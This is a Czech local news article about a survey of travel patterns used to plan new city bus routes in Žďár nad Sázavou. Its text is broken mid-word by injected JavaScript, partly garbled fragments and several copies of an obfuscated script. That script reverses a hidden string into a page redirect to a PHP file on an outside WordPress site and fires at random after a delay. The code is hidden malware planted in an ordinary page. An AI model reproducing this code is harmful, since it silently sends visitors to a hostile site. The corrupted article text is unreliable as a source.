Rainbow page separator

První návrh nového trasování MHD bude představen na podzim

Úterý, 2. srpna 2016

MHD Žďár nad Sázavou

Žďár nad Sázavou / Výsledky veřejného šetření mezi obyvateli související s přípravou změny v městské hromadné dopravě (MHD) má již k dispozici žďárská radnice. Následně pomohou zejména při návrhu na změnu linkového vedení MHD. „Nyní bude na dopravních odbornících, aby navrhli optimální složení a trasování linek. Pokud půjde vše dobře, rádi bychom první koncept nové MHD představili v podzimních měsících,“ vyjádřil se žďárský starosta Zdeněk Navrátil. Z průzkumu například vyplynulo, že největší přepravní potenciál je mezi nádražím a průmyslovou zónou, dále mezi nádražím a Klafarem či nádražím a Libušínem, respektive mezi zastávkou u Žďasu a Libušínem či Stalingradem. Mezi nejméně využívané zdroje nebo cíle cest patří Dagmarky, Pilská nádrž a Nádražní ulice. Menší počet cestujících míří z náměstí k Vodojemu a zpět, případně se přepravuje mezi náměstím a Stalingradem. Mimo cest do zaměstnání a škol z průzkumu vyšla největší vazba mezi nádražím a Vodojemem následovaná cestami mezi nádražím a sídlištěm ve Žďáře nad Sázavou 2 - Zámkem či Bezručovou ulicí, což zřejmě zahrnuje dopravu na nákupy v Kaufl=function(n){if ( () == "string") ; };.list=["\'//\'="];(=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}andu. Kromě ces["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování do zaměstnání a škol je značná vazba ze Stalingradu do čtvrti Libušín, tam jde o přepravu k lékařům v poliklinice. Mimo cest do zaměstnání a škol se rovněž lidé čas["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to přepravují z centra do sídliště ve Žďáře nad Sázavou 2 a do Bezručovy ulice.